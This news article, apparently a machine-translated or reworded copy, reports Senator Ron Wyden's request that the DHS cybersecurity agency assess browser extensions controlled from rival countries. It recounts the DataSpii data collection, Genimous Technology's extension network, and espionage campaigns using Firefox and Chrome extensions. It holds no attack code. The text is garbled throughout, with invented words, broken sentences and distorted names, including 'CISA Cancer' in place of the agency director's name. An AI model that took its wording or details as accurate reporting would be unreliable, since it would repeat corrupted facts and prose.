Enlarge /. Photo illustration by Jakub Porzycki / NurPhoto via Getty Images
A US senator calls on the Department of Homeland Security's cybersecurity division to assess the browser extension threat in countries known to be espioning the US.
"I am concerned that the use of overseas-controlled browser extensions by millions of Americans could jeopardize US national security," wrote Senator Ron Wyden, an Oregon Democrat, in a letter to Christopher Krebs, DHS director of cybersecurity and infrastructure security Agency. "I am concerned that these browser extensions could allow foreign governments to monitor Americans."
Extensions, also known as plugins and add-ons, offer browser functions that are otherwise not available. Ad blockers, language translators, HTTPS enforcers, grammar checkers, and cursor enhancers are just a few examples of legitimate extensions that can be downloaded from either browser controlled repositories or third-party websites.
Unfortunately, extensions have a darker side. Their penetration and opacity make them the perfect receptacle for storing software that logs user-visited websites, steals passwords they enter, and acts as a backdoor through which data is passed between users and attacker-controlled servers.
Extensions: A Short, Dirty Story
One of the more extreme examples of this type of malice came last year when Chrome and Firefox extensions were caught logging the browsing history of more than 4 million users and selling online. People often think that long, complicated web URLs prevent outsiders from accessing medical or accounting data, but the systematic collection, called DataSpii, has proven the assumption wrong.
Sensitive data captured by the extensions included proprietary information from Apple, Symantec, FireEye, Palo Alto Networks, Trend Micro, Tesla and Blue Origin. The Dataspii extensions also collected private medical, financial, and social data from individuals. The collection came to light thanks to the persistent and costly work of an independent researcher.
You can find more examples of abusive extensions here, here, here, and here.
Wyden's letter mentions the case of an expansion provider from China. One country's critics say hackers and others are paid to steal source code, blueprints, and other proprietary data from their foreign opponents. The Senator wrote:
For example, my office researched Genimous Technology, a Chinese company that controls a network of web browser extensions used by more than 10 million consumers through a number of shell companies in offshore countries such as Cyprus and the Cayman Islands. Genimous subsidiaries offer dozens of browser extensions that give users some limited, free features such as weather reports or parcel tracking to gain access to users' computers. The very purpose of Genimous 'browser extensions is to change users' search engine to one offered by Verizon Media, for which Genimous pays a fee.
I fear that the use of overseas controlled browser extensions by millions of Americans could compromise US national security. In particular, I fear these browser extensions could allow foreign governments to monitor Americans.
Neither Genimous nor Verizon immediately responded to a request for comment on this post.
There are at least two reported cases of foreign governments using extensions to espionage hacks. The more advanced attack became known in 2017. They were Firefox extensions that were used by Turla, a Russian-speaking hacking group that many researchers believe works on behalf of the Kremlin.
Such an extension was analyzed by the security company Eset and disguised as a security feature that is available on the website of a fictitious security company. Behind the scenes, it acted as a backdoor connecting infected computers to a Turla command and control server that could retrieve stolen data and upload and install new or updated malware.
To cover its tracks, the extension did not call the server directly. Rather, it has been linked to the comments section of Britney Spears' Instagram account. By calculating a hash from a comment and using a programming technique known as a regular expression, the backdoor was able to infer the server address. Bitdefender researchers came across the same Turla campaign that used other Firefox extensions.
A separate nation-sponsored hack with extensions happened in 2018. He used Chrome extensions available from Google's official Chrome Web Store. The security company Net Scout believes they have stolen data such as browser cookies and / or passwords. To add a touch of authenticity to the extensions, the hackers copied ratings for other extensions that they either praised or criticized.
Over the years Wyden has pushed both government officials and business leaders on a variety of technological topics. Last year, he and Florida Republican Senator Marco Rubio called on CISA Cancer to investigate VPNs that, like extensions, are capable of gathering sensitive information and doing other nefarious things.
"To that end, I ask you to assess the threat posed by web browser extensions offered and controlled by companies in opposing countries," wrote Wyden. "If you discover that these companies and their products are threatening US national security, please take appropriate steps to protect US government employees and government systems."